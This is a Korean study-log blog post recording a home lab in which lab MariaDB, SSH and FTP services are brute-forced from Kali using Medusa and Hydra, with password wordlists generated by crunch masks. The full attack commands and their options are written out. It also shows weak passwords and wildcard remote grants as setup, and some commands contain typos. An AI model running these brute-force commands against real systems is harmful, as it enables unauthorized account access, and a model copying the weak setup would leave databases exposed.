Network Security DAY_011 Medusa 공격 , Hydra 공격 , 리눅스 사전파일 만들기 , crunch 비밀번호 만들기 , 크런치 공격 , 네트워크 공격 , 네트워킹 해킹 , 무차별 대입공격 , Brute force attack , 비밀번호로 ..

2024. 1. 27. 22:28Information Security 정보보안/Network Security 네트워크 보안

728x90

배울 내용:    

Medusa 공격

Hydra 공격 

리눅스 사전파일 만들기 

crunch 비밀번호 만들기

크런치 공격 

네트워크 공격

네트워킹 해킹 

무차별 대입공격

Brute force attack

비밀번호로 해킹하기

MariaDB 해킹 

 

 

 

 

 

 

 

 

제가 지금 부터 작성하는 모든글은 제가 공부기록용이기 때문에 정확하지 않을수 있음을 알려드립니다.

틀린게 있으면 댓글로 써주시면 고치겠습니다.

 

 

 

 

MariaDB 

 

 

접속 

 

방화벽을 꺼주고 

systemcl start mariadb 로

mariadb를 start 시키고 

 

mysql -p mysql 로 mariaDB 를 켜준다

 

 

 

 

 

 

root 패스워드 설정 

 

update user set password=passoword("123456") where user='root';

 

 

 

 

계정 생성/추가

 

 


1. 내부에서만 접근

insert into user(host,user,password) values ("localhost","korea,password("123456"));

 

 

2. 외부에서의 접근 

insert into user(host, user ,password) values ("%" , "korea",password("123456"));

모든 외부 접근 가능 

 

insert into user(host, user ,password) values ("192.168.10.100" , "korea",password("123456"));

192.168.10.100 만 접근가능 

 

insert into user(host, user ,password) values ("192.168.10.%" , "korea",password("123456"));

192.168.10.* 모든 C 클래스 접근 가능 

 

%를 넣으면 외부사용자가 사용할수있고

특정ip 를 넣어서 그 특정 ip만 사용하게 할수있다 

 

 

 

이렇게 해준뒤에 

 

 

 

flush privileges; 

로 적용 시켜주고 

 

 

systemctl restart mariadb 

 

로하면 완벽하게 준비가 된다 

 

 

 

 

 

 

kali에서 192.168.10.101 로 brute forcing 공격하면 

연결 허락을 안해줬기떄문에 안되고 

 

 

 

 

연결을 해주게 되면 

 

 

 

 

 

 

이번에는 되는걸 볼수가있다 

 

 

 

 

 

 

 

 

 

 

[ medusa ]

또다른 패스워드 크래킹 도구

 

 

 

# medusa -u test -p 123456 -h 192.168.10.150 -M ssh
# medusa -u test -p 123456 -h 192.168.10.150 -M http
# medusa -u test -p 123456 -h 192.168.10.150 -M telnet
# medusa -u test -p 123456 -h 192.168.10.150 -M mysql
# medusa -u test -p 123456 -h 192.168.10.150 -M pop3

 

 

위에처럼 모듈을 골라서 명령을 입력하면 

성공하면 Account Found 가 위에 처럼 뜬다 

그리고 맨뒤에 [ SUCCESS] 로 성공한걸 볼수가있다 

 

웹서버 포트로도 브루트포싱을 할수있는 특징이있다 


<옵션>
-u : 계정명
-U : 계정 목록(사전 파일)
-p : 패스워드
-P :패스워드 목록(사전파일)
-h : 공격 대상 호스트 지정 
-M : 모듈 

 

 

 

 

 

 

 

 

 

[ 사전 파일 만들기 ]

 

 crunch

 패스워드 생성 도구

 


# crunch 4 4 1234567890a -o /root/crunch2.txt

 

# crunch 4 4 1234567890a -t 12@@ -o /root/crunch2.txt

앞에 12는 알때 (비밀번호중) 


# crunch 4 4 1234567890a -t 12@@ -o /root/crunch2.txt -p 

 

 

 

 

 

 

# crunch 4 4 1234567890a -o /root/crunch2.txt 이렇게 만들고

확인해보면 1~ 9999 로 만들어져있는게 확인할수있을것이다  

 

 

 

 

 

 

 

만약 비밀번호가 sarimus24 라고 할때

 

비밀번호 길이하고 비밀번호중 sarimus  부분만 알고있을때

뒤에 2개 를 알아낼때 아래와 같이 할수있다

 

crunch 9 9 1234567890 -t sarimus@@ -o findPassword.txt

 

 

 

이렇게 완성이 되서 파일을 열어보면 

 

 

 

 

실제 비밀번호인 sarimus24 가 있는걸 확인할수있다

 

 

 

 

이러한  방법으로 test라는 계정에 

 비밀번호 파일을 만들어 시도해보자

 

우리는 지금까지 test 가 123456 인걸알고있다

그러면 123456을 잠시 12ab 로 바꾼뒤에 시도 해보자 

 

 

먼저 cent OS 에서 test 의 비번을 12ab 로 바꿔주고 

 

 

 

 

 

Kali에서 crunch 로 비밀번호를 생성해주고

 

 

 

 

 

이렇게 만든뒤에 

hydra 로 찾아본다

 

 

 

hydra -l test -P /root/findTestPW.txt ftp://192.168.10.101 -V -f 

로 입력해본다 

 

 

 

이미 계정을 아니깐 

hydra -l test

 

그러나 비밀번호를 모르니깐 아까 crunch로 만들었던 

-P /root/findTestPW.txt

 

그리고 ftp 로 centos 서버인 1921.68.10.101 로 

ftp://192.168.10.101

 

자세히 보여주게 Verdose 모드와 강제모드를 설정해준다

-V -f 

 

 

 

 

 

 

그러면 수많은 시도 끝에 

 

 

성공하게 되는걸 볼수가있다 

 

 

 

 

 

참고로 포트번호도 -s 옵션으로 설정할수있다

 

 

 

아직 hydra를 잘 이해가 안되면 아래의 링크로 가보자 

 

https://sarimus.tistory.com/58

 

Network Security DAY_010 칼리에서 dnsmap 다운 , 스캐닝한 결과 저장 , dnsmap , dnsrecon , fierce , dnsenum

배울 내용: 칼리에서 dnsmap 다운 스캐닝한 결과 저장 dnsmap dnsrecon fierce dnsenum 무차별 대입공격 스캔 목록 이용한 스캐닝 port scanning 제가 지금 부터 작성하는 모든글은 제가 공부기록용이기 때문에

sarimus.tistory.com

 

 

 

 

그러면 포트번호도 가능하니깐

모듈도 txt 에 써서 굳이 몰라도 한번에 모든 모듈을 확인할수있다

 

 

 

target.txt 에는

 

 

 

이렇게 원하는 IP 주소도 넣어서 한번에 시도해볼수도있다 

(192.168.10.101:2121 이런식으로 포트번호도 넣을수있다 ) 

 

 

유용하게 써먹을수있으니 잘기억해두자   

 

 

 

 

 

 

그럼 20000~~

 

 

 

728x90